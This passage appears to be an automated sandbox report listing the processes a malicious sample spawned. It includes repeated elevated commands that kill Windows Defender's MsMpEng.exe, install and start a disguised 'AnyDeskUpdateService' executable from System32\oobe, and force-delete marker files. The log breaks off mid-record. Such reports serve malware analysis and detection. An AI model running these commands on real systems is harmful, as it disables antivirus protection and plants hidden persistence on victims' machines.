Programmed in: C, C++ or other language
Has exited: true

                                                                                                    Target ID:100
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:101
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:102
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:103
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:104
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:105
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:107
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:108
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:109
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:110
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:111
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:112
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:113
                                                                                                    Start time:20:26:36
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:114
                                                                                                    Start time:20:26:36
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:115
                                                                                                    Start time:20:26:36
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:116
                                                                                                    Start time:20:26:36
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:117
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:118
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:119
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:120
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:121
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start AnyDeskUpdateService
Imagebase:0x7ff684ff0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:122
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:123
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:124
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:125
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:126
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /f /im MsMpEng.exe
Imagebase:0x7ff6c7a10000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:127
Start time:20:26:37
Start date:28/09/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start MicrosoftWindowsDefenderCoreService
Imagebase:0x7ff684ff0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:128
Start time:20:26:40
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:129
Start time:20:26:40
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:130
Start time:20:26:40
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:131
Start time:20:26:40
Start date:28/09/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /f /im MsMpEng.exe
Imagebase:0x7ff6c7a10000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:132
Start time:20:26:41
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:133
Start time:20:26:41
Start date:28/09/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start MicrosoftWindowsDefenderCoreService
Imagebase:0x7ff684ff0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:134
Start time:20:26:43
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:135
Start time:20:26:43
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:136
Start time:20:26:43
Start date:28/09/2024
Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Imagebase:0x7ff71dd80000
File size:161'792 bytes
MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:137
Start time:20:26:43
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                    Target ID:138
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    Imagebase:0x7ff7403e0000
                                                                                                    File size:55'320 bytes
                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:139
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:140
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:141
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:142
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:143
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:144
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:145
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:146
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:147
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:148
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:149
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:150
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:151
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:152
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:153
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:154
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:157
                                                                                                    Start time:20:26:49
                                                                                                    Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:166
Start time:20:26:50
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:168
Start time:20:26:51
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:183
Start time:20:26:56
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:187
Start time:20:26:56
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:189
Start time:20:26:56
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
